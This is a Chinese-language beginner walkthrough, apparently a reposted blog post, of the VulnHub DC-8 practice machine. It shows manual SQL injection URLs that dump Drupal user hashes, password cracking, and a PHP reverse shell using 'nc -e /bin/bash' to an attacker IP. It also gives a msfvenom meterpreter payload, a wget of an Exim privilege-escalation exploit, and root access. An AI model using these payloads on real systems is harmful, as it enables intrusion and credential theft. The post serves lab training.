目錄
- 靶機DC-8 (詳細滲透,適合新手滲透)
- 0x01靶機描述
- 0x02環境搭建
- 1. 下載并匯入靶機
- 2. 查看網路配接器
- 3. 啟動靶機
- 0x03靶機滲透
- 一、 資訊收集
- 1. 主機發現
- 2. 埠掃描
- 3. 詳細掃描
- 4. 目錄掃描
- 5. gobuster目錄掃描
- 6. 網站指紋識別
- 二、 漏洞挖掘
- 手工sql注入
- 1. 通過手工驗證,此處url含有sql注入漏洞
- 2. 判斷欄位數
- 3. 判斷顯示位置
- 4. 查看當前資料庫
- 5. 查找庫d7db中所有的表
- 6. 查找uesrs表中所有的列
- 7. 查詢表中的資料
- sqlmap自動化執行
- 1. 查當前資料庫
- 2. 查表
- 3. 查資料
- 4. 使用John進行暴力破解
- 5. 可以將破解出來的密碼嘗試ssh遠程登錄
- 6. 在此網頁嘗試登錄,該網頁由前面目錄掃描得到
- 遠程代碼執行漏洞
- 1.找到可以編輯php代碼的地方
- 2.嘗試寫phpinfo代碼
- 三、 漏洞利用
- 方法一:
- 1. 撰寫反彈shell腳本
- 2.保存提交前開啟kali進行監聽
- 3. 點擊提交發現網頁此時正跳轉,而我們的攻擊機已經拿到shell
- 方法二:
- 1. 使用msfvenom制作反彈shell腳本
- 2.將php代碼復制到網站中
- 3. kali設定msf選項,進行監聽
- 4.提交代碼(此時后臺默認執行所撰寫的php腳本代碼)
- 5. 拿到shell,并用python打開一個標準shell
- 四、 提權
- 1.find 命令查找具有sudo權限的命令,發現exim4在使用時具有root權限`
- 2.查看命令exim4命令版本
- 3.利用serachsploit查找exim命令的漏洞
- 4.進行查看用法,發現有兩個使用方法
- 5.將檔案復制到/tmp目錄,并用python打開一個臨時的HTTP服務
- 6.將46996.sh下載到靶機
- 7.然后我們再重新進行上傳
- 8.查看flag
- 0x04實驗總結
靶機DC-8 (詳細滲透,適合新手滲透)
0x01靶機描述
靶機資訊
| 鏈接 | https://www.vulnhub.com/entry/dc-8,367/ |
|---|---|
| 發布日期 | 2019年9月4日 |
| 作者 | DCAU |
| 難度 | 簡單 |
0x02環境搭建
1. 下載并匯入靶機
打開vmware-檔案-打開-DC-8.ova


2. 查看網路配接器
將靶機網路配接器改為NAT模式

3. 啟動靶機
點擊 ?靶機,開啟成功

0x03靶機滲透
一、 資訊收集
1. 主機發現


2. 埠掃描

3. 詳細掃描

4. 目錄掃描

5. gobuster目錄掃描
為了避免漏掃,gobuster再進行目錄掃描

6. 網站指紋識別

二、 漏洞挖掘
手工sql注入
1. 通過手工驗證,此處url含有sql注入漏洞
http://192.168.30.206/?nid=2 and 1=1 --+

http://192.168.30.206/?nid=2 and 1=2 --+

2. 判斷欄位數
http://192.168.30.206/?nid=2 order by 1 --+

http://192.168.30.206/?nid=2 order by 2 --+

所以可以看出欄位數為1
3. 判斷顯示位置
http://192.168.30.206/?nid=-2 union select 1 --+

4. 查看當前資料庫

5. 查找庫d7db中所有的表
http://192.168.30.206/?nid=-2 union select group_concat(table_name) from
information_schema.tables where table_schema=‘d7db’ --+

6. 查找uesrs表中所有的列
http://192.168.30.206/?nid=-2 union select group_concat(column_name) from
information_schema.columns where table_name=‘users’ --+

7. 查詢表中的資料
http://192.168.30.206/?nid=-2 union select group_concat(name) from users --+

http://192.168.30.206/?nid=-2 union select group_concat(pass) from users --+

sqlmap自動化執行
1. 查當前資料庫


2. 查表



3. 查資料

查詢到兩組資料
admin $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
4. 使用John進行暴力破解
破解出john的密碼trutle
5. 可以將破解出來的密碼嘗試ssh遠程登錄
發現ssh遠程登錄失敗,發現需要使用公私鑰登錄


6. 在此網頁嘗試登錄,該網頁由前面目錄掃描得到
http://192.168.30.206/user
登錄成功


-
遠程代碼執行漏洞
1.找到可以編輯php代碼的地方


2.嘗試寫phpinfo代碼



發現保存并提交后并沒有任何顯示,按照網上的說法,php代碼保存后會執行代碼,這應該是在靶機上已經執行了代碼,只是在后臺不會顯示出來,
三、 漏洞利用
方法一:
1. 撰寫反彈shell腳本
我們嘗試執行PHP反彈shell腳本,將原有的<p>flag</p>進行保留,防止報錯
<p>flag</p>
<?php
system("nc -e /bin/bash 192.168.30.182 4567");
?>

2.保存提交前開啟kali進行監聽

3. 點擊提交發現網頁此時正跳轉,而我們的攻擊機已經拿到shell



方法二:
1. 使用msfvenom制作反彈shell腳本
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.30.182 lport=9999
R >php_shell.txt

2.將php代碼復制到網站中

3. kali設定msf選項,進行監聽



4.提交代碼(此時后臺默認執行所撰寫的php腳本代碼)

5. 拿到shell,并用python打開一個標準shell
python -c 'import pty;pty.spawn("/bin/bash")'

四、 提權
1.find 命令查找具有sudo權限的命令,發現exim4在使用時具有root權限`
find / -perm -u=s -type f 2>/dev/null

2.查看命令exim4命令版本
Exim version 4.89

3.利用serachsploit查找exim命令的漏洞

4.進行查看用法,發現有兩個使用方法

5.將檔案復制到/tmp目錄,并用python打開一個臨時的HTTP服務

6.將46996.sh下載到靶機
wget http://192.168.30.182/46996.sh

進行賦權

執行,但是發現兩種方法均發生錯誤

原因:這個報錯是由于windows系統下編輯然后上傳到linux系統執行導致的
解決方案:本地編輯查看檔案型別:set ff=unix

7.然后我們再重新進行上傳

使用第二個提權命令進行提權成功
./46996.sh -m netcat


8.查看flag

0x04實驗總結
這個靶機考察了目錄掃描,sql注入,遠程代碼執行,反彈shell,提權時使用find查找可以執行的命令,對命令exim的版本提權漏洞等,是一個不錯的靶機,適合新手來滲透
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/297772.html
標籤:其他
